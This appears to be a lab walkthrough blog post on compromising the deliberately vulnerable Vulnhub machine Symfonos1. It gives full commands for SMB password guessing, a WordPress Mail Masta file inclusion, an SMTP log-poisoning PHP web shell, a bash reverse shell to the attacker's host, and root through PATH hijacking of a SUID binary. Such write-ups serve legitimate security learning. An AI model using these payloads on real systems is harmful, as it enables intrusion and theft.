Vulnhub - Symfonos1

Hi all, Let’s start this awesome series!

You can find the machine there > Symfonos1

Enumeration/Reconnaissance

Let’s start always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
$ ip=192.168.1.12
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-15 22:14 EEST
Nmap scan report for symfonos.local (192.168.1.12)
Host is up (0.000075s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:7E:E4:6F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds
$ nmap -p 22,25,80,139,445 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-15 22:15 EEST
Nmap scan report for symfonos.local (192.168.1.12)
Host is up (0.00032s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:7E:E4:6F (VMware)

Lot of things to enumerate, but first let’s add the symfonos.local to our hosts file as the box description says.

192.168.1.12 symfonos.local

Let’s start with SMB, let’s list the shares. I’ll show you 2 ways to do that:

1
2
3
4
5
6
7
8
$ smbmap -H $ip
[+] Guest session   	IP: 192.168.1.12:445	Name: symfonos.local                                    
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	helios                                            	NO ACCESS	Helios personal share
	anonymous                                         	READ ONLY	
	IPC$                                              	NO ACCESS	IPC Service (Samba 4.5.16-Debian)
1
2
3
4
5
6
7
8
9
$ smbclient -L //$ip
Enter WORKGROUP\root's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	helios          Disk      Helios personal share
	anonymous       Disk      
	IPC$            IPC       IPC Service (Samba 4.5.16-Debian)

Let’s connect to anonymous share since we have READ ONLY permission.

Great, we have 3 possible passwords -> epidioko:qwerty:baseball. We can see a helios share, that’s a username. After some tries i found the right password:

1
2
3
$ echo qwerty | smbclient //$ip/helios -U helios    
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.

Let’s connect to it and download the files.

todo.txt has an interesting directory:

1
2
3
4
5
$ cat todo.txt 

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

It’s a wordpress site:

SMTP log poisoning - shell as helios

Let’s run wpscan on it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ wpscan --no-banner --url http://symfonos.local/h3l105/ -e ap
[+] URL: http://symfonos.local/h3l105/ [192.168.1.12]
[+] Started: Wed Jul 15 22:53:20 2020

Interesting Finding(s):

..junk data..

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

mail-masta plugin seems interesting. Let’s search for possible exploits.

1
2
3
4
5
6
7
$ searchsploit mail masta
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                         |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion                                                                                                 | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection                                                                                                        | php/webapps/41438.txt
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Let’s check the LFI one & we have LFI:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ curl "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:111::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false

Now we need to find a way to get shell, i stuck here for a bit. But then i noticed that SMTP is open.

SMTP(Simple Mail Transfer Protocol) server send & receive emails.

We can do SMTP log poisoning, we will send an email to user helios with our payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ telnet $ip 25
Trying 192.168.1.12...
Connected to 192.168.1.12.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO pwned.pwn
250 symfonos.localdomain
MAIL FROM: atom@pwned.com
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
Subject: <?php echo system($_GET["cmd"]); ?>
Hello! :)
.
250 2.0.0 Ok: queued as EF2F340698
quit
221 2.0.0 Bye
Connection closed by foreign host.

Now the local mailbox is under /var/mail/$USER and we have RCE:

1
2
3
$ curl -s "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls+-la" | tail -3
-rwxr-xr-x 1 helios helios 23492 Jun 28  2019 view-campaign.php
-rwxr-xr-x 1 helios helios 23492 Jun 28  2019 view-campaign.phpHello!:)

Let’s spawn a shell now. I’ll show you a good trick to url encode/decode from terminal:

$ apt-get install gridsite-clients

1
2
$ urlencode "bash -c 'bash -i >& /dev/tcp/192.168.1.16/5555 0>&1'"
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.16%2F5555%200%3E%261%27
1
$ curl -s "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.16%2F5555%200%3E%261%27"

We have shell:

1
2
3
$ nc -lvp 5555
<h3l105/wp-content/plugins/mail-masta/inc/campaign$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<h3l105/wp-content/plugins/mail-masta/inc/campaign$ 

helios -> root

Privesc is simple, let’s check for SUIDs.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
helios@symfonos:/$ find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping

/opt/statuscheck seems interesting, if we run strings on it we can see that execute curl:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
helios@symfonos:/$ strings /opt/statuscheck
strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H <----
http://lH

We can exploit this, by making the binary to execute our curl. We will modify the PATH environmental variable, first let’s make the file:

1
2
3
4
helios@symfonos:/$ cd /tmp
helios@symfonos:/tmp$ touch curl    
helios@symfonos:/tmp$ chmod +x curl
helios@symfonos:/tmp$ echo "bash -p" > curl

You may notice the -p argument, this allows the shell to run with SUID privileges.

Now let’s modify the PATH & run the binary.

1
2
3
4
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
helios@symfonos:/tmp$ /opt/statuscheck
bash-4.4# whoami
root

That was an awesome box! :D